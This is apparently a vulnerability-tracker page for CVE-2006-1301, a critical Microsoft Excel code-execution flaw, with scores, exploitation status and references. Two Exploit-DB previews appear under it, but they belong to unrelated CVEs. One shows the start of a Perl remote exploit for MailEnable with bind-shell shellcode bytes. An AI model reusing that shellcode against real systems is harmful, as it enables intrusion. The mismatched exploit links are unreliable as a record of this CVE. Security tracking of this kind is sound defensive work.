CVE-2006-1301
published 2006-07-13CVE-2006-1301: Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted SELECTION record that triggers memory…
PriorityP262critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWVulnCheck KEV
Exploited in the wild
EPSS
9.82%
95.0th percentile
Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted SELECTION record that triggers memory corruption, a different vulnerability than CVE-2006-1302.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | excel | — | — |
| microsoft | excel | — | — |
| microsoft | excel | — | — |
| microsoft | excel | — | — |
| microsoft | excel | — | — |
| microsoft | excel_viewer | — | — |
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-26g2-mv7p-7j93: Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a
ghsa_unreviewed·2022-05-01·CVSS 9.3
CVE-2006-1301 [CRITICAL] CWE-94 GHSA-26g2-mv7p-7j93: Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a
Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted SELECTION record that triggers memory corruption, a different vulnerability than CVE-2006-1302.
VulnCheck
Microsoft Excel Improper Control of Generation of Code ('Code Injection')
vulncheck·2006·CVSS 9.3
CVE-2006-1301 [CRITICAL] Microsoft Excel Improper Control of Generation of Code ('Code Injection')
Microsoft Excel Improper Control of Generation of Code ('Code Injection')
Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted SELECTION record that triggers memory corruption, a different vulnerability than CVE-2006-1302.
Affected: Microsoft Excel
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-037
No detection rules found.
Exploit-DB
MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow
exploitdb·2007-03-02
CVE-2007-1301 MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow
MailEnable Professional/Enterprise 2.37 - 'APPEND' Remote Buffer Overflow
---
#!/usr/bin/perl
#
# maildisable-v4.pl
#
# Mail Enable Professional/Enterprise v2.32-4 (win32) remote exploit
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
# Mail Enable Professional v2.33 (win32)
# Mail Enable Professional v2.35 (win32)
# Mail Enable Professional v2.37 (win32)
#
########
use Getopt::Std; getopts('t:n:u:p:', \%arg);
use Socket;
# Fixed metasploit win32 bindshell port 1337
my $zshell_win32_bind =
"\x33\xc9\x83\xe9\xb0".
"\x81\xc4\xd0\xfd\xff\xff". # add %esp, -560
"\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1d".
"\xcc\x32\x69\x83\xeb\xfc\xe2\xf4\xe1\xa6\xd9\x24\xf5\x35\xcd\x96".
"\xe2\xac\xb9\x05\x39\xe8\xb9\x2c\x21\x47\x4e\x6c\x65\xcd\xdd\xe2"
Exploit-DB
X11R6 < 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow
exploitdb·2006-09-08
CVE-2006-4655 X11R6 < 6.4 XKEYBOARD (sco x86) - Local Buffer Overflow
X11R6 ,
* Ramon de Carvalho Valle
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include
#include
#include
#include
#define ADRSIZE 102
No writeups or analysis indexed.
http://securitytracker.com/id?1016472http://www.securityfocus.com/bid/18853http://www.vupen.com/english/advisories/2006/2755https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-037https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A557http://securitytracker.com/id?1016472http://www.securityfocus.com/bid/18853http://www.vupen.com/english/advisories/2006/2755https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-037https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A557
2006-07-13
Published
Exploited in the wild